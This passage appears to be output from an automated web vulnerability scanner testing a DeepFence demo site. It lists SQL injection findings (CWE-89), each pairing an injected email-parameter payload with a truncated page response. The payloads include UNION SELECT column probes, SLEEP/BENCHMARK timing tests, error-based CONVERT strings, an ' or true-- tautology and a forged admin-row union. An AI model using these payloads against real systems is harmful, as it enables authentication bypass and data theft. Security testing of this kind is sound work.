src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1014\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1015\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1016\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88\n)+CHAR(88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1017\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1018\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1019\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1020\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1021\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or sleep(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1022\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"\n81dc9bdb52d04dc20036dbd8313ed055\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1023\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1024\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1025\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #1026\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1027\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ 